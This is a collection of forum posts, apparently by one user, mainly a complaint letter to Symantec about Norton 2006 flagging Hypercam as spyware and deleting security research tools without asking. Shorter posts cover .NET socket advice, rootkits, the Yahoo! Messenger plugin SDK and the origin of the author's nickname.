I know that it will not do any good but I had to blow off some steam. Below is the letter that I sent to Norton feedback. Does anyone have an address that I can send a hardcopy to? To Whom It May Concern: I have been a supporter of Symantec products for several years now. I not only recommend your products to all of my friends but also to all of my co-workers as I am the IT department for my company division. I recently purchased SystemWorks 2006 and Internet Security 2006 in anticipation that these products were improved versions that would add extra security features. That was about two months ago and now I am seriously considering uninstalling all Norton products and installing a competitors product. Although this letter may not be read by anyone other than a lonely email server script, I feel a need to give you feedback to why I have become so angry. I know from a customer service standpoint that good feedback can be invaluable and I have been a loyal customer for so long that I feel it my duty. The one feature that makes me the most angry, if not burst into a psychotic fit, is the spyware detection. The straw that broke the camels back so to speak was an alert that I received stating that Norton had detected a spyware called Hypercam (spyware.hypercam, http://forums.xisto.com/no_longer_exists/). I have been an avid Hypercam user for several years and I can not come close to a reason that this software should be considered spyware. I understand that it can take screenshots of your desktop but why didnât the 20 other screen capture tools on my computer get detected? Now to the more serious reason that I am considering switching to another security platform. I am a security researcher. I have several large documents on my wall that state I know a fair bit about computers. Most notably I have a Masters in Computer Engineering with a specialty in security. Now I am not telling you this to brag, I am telling you this to build credibility. With all of this said I have some very nasty things that live on my computer. Prior to installing AV 2006 I had a very nice collection of research tools (hacktools according to Norton) that I had acquired. Admittedly many were not things the normal users should have installed but they were there none the less. After the first scan, years of work were gone, all without asking me. I can understand detecting these programs but at least give me an option to exclude them. I was raving mad after they were deleted without my approval. I also have questions with some of the programs labeled hacktools. I use netcat, nmap, Cain and Able, John the Ripper, and the list goes on, on a daily basis. Yet every time I download them again I am not asked, they are just deleted. Example; I currently have the install file for Cain and Able in my download directory. Every time I try to download something new I get that same annoying message. I am not given the opportunity to say âhey this is OK.â I suppose all that I am asking is to say that a program is OK and never be bothered by Norton again. All of this is quite surprising considering Symantec has a lengthy involvement in the security community. I regularly stop by Security Focus and Foundstone (both owned by Symantec). If these sites are not the epitome of what a user should not have on his computer I donât know what is. I also have to question why Norton is going after specific products such as Hypercam. In my opinion, Windows Media Player is a bigger spyware threat than Hypercam could ever be. I will have to apologize for having a harsh tone with this subject but this has been driving me nuts ever since I installed the latest installment of Norton. I know that you can not do anything about my particular situation but I do feel obligated to let you know why I will not purchasing any more Symantec products or recommending them to anyone else. With saddened departure, xxx

Theyâve gone too far this time. I just got a popup about the most hideous threat that I have ever seen. Spyware.HyperCam http://forums.xisto.com/no_longer_exists/ Are they serious? How in the world could Hypercam be a threat? Who in their right mind could even come up with such a thing? Will Windows Media Player be next?

If you are using .NET then I would highly suggest researching the System.Net namespace, specifically the socket class. If you are using VB6 then I would highly suggest downloading a free copy of VB.NET Express from Microsoft. It will make your life much easier.I will additionally make the suggestion that unless you are performing some low level protocol handling, you should use something like httpWebRequest. I have done very little with VB6 but I know that in .NET you still have to make all of your DLL imports. Tell us a little bit more about what you are trying to do and maybe I can make some more suggestions.

Viruses are much nastier now and are learning a lot of tricks from spyware. It’s no wonder that you had to go through all of these steps. I have had several instances of spyware infections where I had no choice but to reformat because there was simply no cure.With root kits, polymorphism, and other nasties on the rise, it’s only a matter of time.

I don’t want to get the Windows vs. Linux debate going in here but I would like to have some constructive suggestions besides “change OS.” The fact is I have no choice but to run Windows. Besides preferring Windows, I am a .NET programmer and for the most part that is limited to Windows. I have a business to run and that business plan has Windows as the OS.So the question still remains, does anyone have (constructive) suggestions?

I didn't realize that any other Yahoo! programers were around here. Good to see someone with similar interests.I printed off the SDK docs yesterday but haven't had that much time to look through them. Another down side (for me that is) is will have to be coded in C++. I am a big .NET managed fan myself.Not to have too much of a shamless plug, why don't you stop by my website at http://www.ycoderscookbook.com/. I am looking for some good core Yahoo! programmers.

So what product does detect underground and 0-day exploits? If a product could detect these then they wouldn't be underground anymore.

I read this morning at theunofficialyahooweblog (https://www.engadget.com/) that Yahoo! has just released a SDK for a plugin engine that will reside in the next version of Messenger. I canât wait to dig into this seemingly juicy morsel of Yahoo! fun. Iâm not sure what all one can do with the SDK yet but I will be sure to report what I find. The SDK can be found at https://developer.yahoo.com/. A list of already published plugins can be found at http://forums.xisto.com/no_longer_exists/. Does anyone have some good ideas for a plugin?

Tansqrx = tangent squared of x = tan^2(x) I came up with this nick during a particularly grueling semester of Calculus II. I am by nature a geek and I have always loved some of the weird symbols in math. I really liked the weirdness of squaring a trig function and not the variable, i.e. tan^2(x). I also think the tangent is the most unique of the three main trig functions (cos, sin, tan). Sin is too common and Cos is only 180 degrees away from Sin. Tan has some unique properties and looks nothing like the other two when graphed. In the pursuit of creating a very unique nick, I can up with tansqrx.